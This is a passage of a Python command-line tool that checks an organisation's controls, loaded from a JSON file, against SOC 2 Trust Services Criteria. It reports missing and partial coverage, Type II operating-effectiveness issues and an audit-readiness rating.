        "CC5.3": "Policy deployment",
        "CC6.1": "Logical access security",
        "CC6.2": "Access provisioning",
        "CC6.3": "Access removal",
        "CC6.4": "Access review",
        "CC6.5": "Physical access",
        "CC6.6": "Encryption",
        "CC6.7": "Data transmission restrictions",
        "CC6.8": "Unauthorized software prevention",
        "CC7.1": "Vulnerability management",
        "CC7.2": "Anomaly monitoring",
        "CC7.3": "Event evaluation",
        "CC7.4": "Incident response",
        "CC7.5": "Incident recovery",
        "CC8.1": "Change management",
        "CC9.1": "Vendor risk management",
        "CC9.2": "Risk mitigation/transfer",
    },
    "availability": {
        "A1.1": "Capacity and performance management",
        "A1.2": "Backup and recovery",
        "A1.3": "Recovery testing",
    },
    "confidentiality": {
        "C1.1": "Confidential data identification",
        "C1.2": "Confidential data protection",
        "C1.3": "Confidential data disposal",
    },
    "processing-integrity": {
        "PI1.1": "Processing accuracy",
        "PI1.2": "Processing completeness",
        "PI1.3": "Processing timeliness",
        "PI1.4": "Processing authorization",
    },
    "privacy": {
        "P1.1": "Privacy notice",
        "P2.1": "Choice and consent",
        "P3.1": "Data collection",
        "P4.1": "Use and retention",
        "P4.2": "Disposal",
        "P5.1": "Access rights",
        "P5.2": "Correction rights",
        "P6.1": "Disclosure controls",
        "P6.2": "Breach notification",
        "P7.1": "Data quality",
        "P8.1": "Privacy monitoring",
    },
}
# Type II additional checks: operating-effectiveness criteria with severities.
# NOTE(review): analyze_type2_gaps() hard-codes the same check names and
# severities inline rather than iterating this table — keep the two in sync.
TYPE2_CHECKS: List[Dict[str, str]] = [
    {
        "check": "evidence_period",
        "description": "Evidence covers the full observation period",
        "severity": "critical",
    },
    {
        "check": "operating_consistency",
        "description": "Control operated consistently throughout the period",
        "severity": "critical",
    },
    {
        "check": "exception_handling",
        "description": "Exceptions are documented and addressed",
        "severity": "high",
    },
    {
        "check": "owner_accountability",
        "description": "Control owners documented and accountable",
        "severity": "medium",
    },
    {
        "check": "evidence_timestamps",
        "description": "Evidence has timestamps within the observation period",
        "severity": "high",
    },
    {
        "check": "frequency_adherence",
        "description": "Control executed at the specified frequency",
        "severity": "critical",
    },
]
def load_controls(filepath: str) -> List[Dict[str, Any]]:
    """Load current controls from a JSON file.

    Accepts either ``{"controls": [...]}`` or a bare JSON array.

    Args:
        filepath: Path to the controls JSON file.

    Returns:
        The list of control dictionaries.

    Exits the process with status 1 (after printing to stderr) on a missing
    file, invalid JSON, or an unexpected top-level structure.
    """
    try:
        with open(filepath, "r") as f:
            data = json.load(f)
    except FileNotFoundError:
        print(f"Error: File not found: {filepath}", file=sys.stderr)
        sys.exit(1)
    except json.JSONDecodeError as e:
        print(f"Error: Invalid JSON in {filepath}: {e}", file=sys.stderr)
        sys.exit(1)

    if isinstance(data, dict) and "controls" in data:
        return data["controls"]
    if isinstance(data, list):
        return data

    print(
        "Error: Expected JSON with 'controls' array or a plain array.",
        file=sys.stderr,
    )
    sys.exit(1)
def detect_categories(controls: List[Dict[str, Any]]) -> List[str]:
    """Detect which TSC categories are represented in the controls.

    A category counts as present when any of its criterion IDs appears
    in some control's ``tsc_criteria``. The "security" category is
    always included since it is required.

    Returns:
        Sorted list of category names (keys of REQUIRED_TSC).
    """
    seen = {ctrl.get("tsc_criteria", "") for ctrl in controls}
    seen.discard("")
    categories = {
        cat
        for cat, criteria in REQUIRED_TSC.items()
        if any(tsc_id in seen for tsc_id in criteria)
    }
    # Always include security as it's required.
    categories.add("security")
    return sorted(categories)
def analyze_coverage(
    controls: List[Dict[str, Any]], categories: List[str]
) -> Tuple[List[Dict], List[Dict], List[Dict]]:
    """Analyze TSC coverage and identify gaps.

    Args:
        controls: Current control entries (each may carry ``tsc_criteria``,
            ``status``, ``owner``, ``control_id``).
        categories: TSC categories in scope (keys of REQUIRED_TSC).

    Returns:
        Tuple ``(gaps, partial, covered)``: criteria with no mapped
        control, criteria whose controls look incomplete (unstarted or
        ownerless), and criteria that appear fully implemented.
    """
    # Group the existing controls by the TSC criterion they address.
    mapped: Dict[str, List[Dict[str, Any]]] = {}
    for ctrl in controls:
        tsc = ctrl.get("tsc_criteria", "")
        if tsc:
            mapped.setdefault(tsc, []).append(ctrl)

    gaps: List[Dict] = []
    partial: List[Dict] = []
    covered: List[Dict] = []

    for cat in categories:
        for tsc_id, tsc_desc in REQUIRED_TSC.get(cat, {}).items():
            ctrls = mapped.get(tsc_id)
            if not ctrls:
                # No control addresses this criterion at all.
                gaps.append(
                    {
                        "tsc_criteria": tsc_id,
                        "description": tsc_desc,
                        "category": cat,
                        "gap_type": "missing",
                        "severity": "critical" if cat == "security" else "high",
                        "remediation": f"Implement control(s) addressing {tsc_id}: {tsc_desc}",
                    }
                )
                continue

            # A criterion is "partial" when any mapped control is unstarted
            # or lacks an accountable owner.
            has_issues = any(
                ctrl.get("status", "").lower() in ("not started", "not_started", "")
                or ctrl.get("owner", "TBD") in ("TBD", "", "N/A")
                for ctrl in ctrls
            )
            control_ids = [c.get("control_id", "N/A") for c in ctrls]
            if has_issues:
                partial.append(
                    {
                        "tsc_criteria": tsc_id,
                        "description": tsc_desc,
                        "category": cat,
                        "gap_type": "partial",
                        "severity": "medium",
                        "controls": control_ids,
                        "remediation": f"Complete implementation and assign owners for {tsc_id} controls",
                    }
                )
            else:
                covered.append(
                    {
                        "tsc_criteria": tsc_id,
                        "description": tsc_desc,
                        "category": cat,
                        "controls": control_ids,
                    }
                )
    return gaps, partial, covered
def analyze_type2_gaps(controls: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Additional gap analysis for Type II operating effectiveness.

    For each control, flags a missing evidence date, an unassigned
    owner, a non-collected status, and an undefined execution
    frequency.

    Returns:
        One entry per control that has at least one issue; each entry
        carries the control's identifiers and its list of issues.
    """
    findings: List[Dict[str, Any]] = []
    for ctrl in controls:
        issues: List[Dict[str, str]] = []

        # Operating evidence must exist and carry a date.
        if not ctrl.get("evidence_date", ""):
            issues.append(
                {
                    "check": "evidence_period",
                    "severity": "critical",
                    "detail": "No evidence date recorded",
                }
            )

        # Someone must be accountable for the control's operation.
        if ctrl.get("owner", "TBD") in ("TBD", "", "N/A"):
            issues.append(
                {
                    "check": "owner_accountability",
                    "severity": "medium",
                    "detail": "No control owner assigned",
                }
            )

        # Anything short of collected evidence can't demonstrate
        # consistent operation over the observation period.
        if ctrl.get("status", "").lower() not in ("collected", "complete", "done"):
            issues.append(
                {
                    "check": "operating_consistency",
                    "severity": "critical",
                    "detail": f"Control status is '{ctrl.get('status', 'Not Started')}' — operating evidence needed",
                }
            )

        # A defined frequency is needed to judge adherence.
        if not ctrl.get("frequency", ""):
            issues.append(
                {
                    "check": "frequency_adherence",
                    "severity": "critical",
                    "detail": "No control frequency defined",
                }
            )

        if issues:
            findings.append(
                {
                    "control_id": ctrl.get("control_id", "N/A"),
                    "tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
                    "description": ctrl.get("description", "N/A"),
                    "issues": issues,
                }
            )
    return findings
def build_report(
    controls: List[Dict[str, Any]],
    audit_type: str,
    categories: List[str],
    gaps: List[Dict],
    partial: List[Dict],
    covered: List[Dict],
    type2_gaps: List[Dict],
) -> Dict[str, Any]:
    """Build the complete gap analysis report.

    Combines coverage counts, a readiness verdict derived from coverage
    percentage and critical gaps, and the detailed gap/partial/covered
    lists. For "type2" audits an operating-effectiveness section is
    appended from ``type2_gaps``.
    """
    total_criteria = sum(len(REQUIRED_TSC[c]) for c in categories if c in REQUIRED_TSC)
    covered_count = len(covered)
    coverage_pct = (
        round(covered_count / total_criteria * 100, 1) if total_criteria > 0 else 0
    )
    critical_gaps = sum(1 for g in gaps if g.get("severity") == "critical")

    # Readiness verdict, from most to least ready.
    if coverage_pct >= 90 and critical_gaps == 0:
        readiness = "Ready"
    elif coverage_pct >= 75:
        readiness = "Near Ready — address gaps before audit"
    elif coverage_pct >= 50:
        readiness = "Significant work needed"
    else:
        readiness = "Not ready — major build-out required"

    report: Dict[str, Any] = {
        "report_metadata": {
            "audit_type": audit_type,
            "categories_assessed": categories,
            "report_date": datetime.now().strftime("%Y-%m-%d"),
            "total_controls_assessed": len(controls),
        },
        "coverage_summary": {
            "total_criteria": total_criteria,
            "covered": covered_count,
            "partially_covered": len(partial),
            "missing": len(gaps),
            "coverage_percentage": coverage_pct,
            "critical_gaps": critical_gaps,
            "readiness_assessment": readiness,
        },
        "gaps": gaps,
        "partial_implementations": partial,
        "covered_criteria": covered,
    }

    if audit_type == "type2":
        report["type2_operating_gaps"] = {
            "controls_with_issues": len(type2_gaps),
            "total_issues": sum(len(g["issues"]) for g in type2_gaps),
            "details": type2_gaps,
        }
    return report
def format_text_report(report: Dict[str, Any]) -> str:
    """Format the gap analysis report as human-readable text.

    Renders metadata, the coverage summary, missing-control and
    partial-implementation sections (only when non-empty), and the
    Type II operating gaps section when present in the report.
    """
    out: List[str] = ["=" * 65, "SOC 2 Gap Analysis Report", "=" * 65, ""]

    meta = report["report_metadata"]
    out += [
        f"Audit Type: {meta['audit_type'].upper()}",
        f"Report Date: {meta['report_date']}",
        f"Categories: {', '.join(meta['categories_assessed'])}",
        f"Controls: {meta['total_controls_assessed']}",
        "",
    ]

    cov = report["coverage_summary"]
    out += [
        "--- Coverage Summary ---",
        f"  Total TSC Criteria: {cov['total_criteria']}",
        f"  Fully Covered: {cov['covered']}",
        f"  Partially Covered: {cov['partially_covered']}",
        f"  Missing: {cov['missing']}",
        f"  Coverage: {cov['coverage_percentage']}%",
        f"  Critical Gaps: {cov['critical_gaps']}",
        f"  Readiness: {cov['readiness_assessment']}",
        "",
    ]

    gaps = report.get("gaps", [])
    if gaps:
        out.append(f"--- Missing Controls ({len(gaps)}) ---")
        for g in gaps:
            out.append(f"  [{g['severity'].upper()}] {g['tsc_criteria']}: {g['description']}")
            out.append(f"    Remediation: {g['remediation']}")
        out.append("")

    partial = report.get("partial_implementations", [])
    if partial:
        out.append(f"--- Partial Implementations ({len(partial)}) ---")
        for p in partial:
            out.append(
                f"  [{p['severity'].upper()}] {p['tsc_criteria']}: {p['description']}"
            )
            out.append(f"    Controls: {', '.join(p.get('controls', []))}")
            out.append(f"    Remediation: {p['remediation']}")
        out.append("")

    # Present only when build_report() ran in type2 mode.
    if "type2_operating_gaps" in report:
        t2 = report["type2_operating_gaps"]
        out.append(
            f"--- Type II Operating Gaps ({t2['controls_with_issues']} controls, {t2['total_issues']} issues) ---"
        )
        for detail in t2["details"]:
            out.append(f"  [{detail['control_id']}] {detail['description']}")
            for issue in detail["issues"]:
                out.append(
                    f"    - [{issue['severity'].upper()}] {issue['check']}: {issue['detail']}"
                )
        out.append("")
    return "\n".join(out)
def main():
    """CLI entry point: parse arguments, run the analysis, print the report."""
    parser = argparse.ArgumentParser(
        description="SOC 2 Gap Analyzer — identifies gaps between current controls and SOC 2 requirements."
    )
    parser.add_argument(
        "--controls",
        type=str,
        required=True,
        help="Path to JSON file with current controls (from control_matrix_builder.py or custom)",
    )
    parser.add_argument(
        "--type",
        type=str,
        choices=["type1", "type2"],
        default="type1",
        help="Audit type: type1 (design only) or type2 (design + operating effectiveness)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        help="Output in JSON format",
    )
    args = parser.parse_args()

    controls = load_controls(args.controls)
    categories = detect_categories(controls)
    gaps, partial, covered = analyze_coverage(controls, categories)

    # Operating-effectiveness checks apply only to Type II audits.
    type2_gaps = analyze_type2_gaps(controls) if args.type == "type2" else []

    report = build_report(
        controls, args.type, categories, gaps, partial, covered, type2_gaps
    )
    print(json.dumps(report, indent=2) if args.json else format_text_report(report))


if __name__ == "__main__":
    main()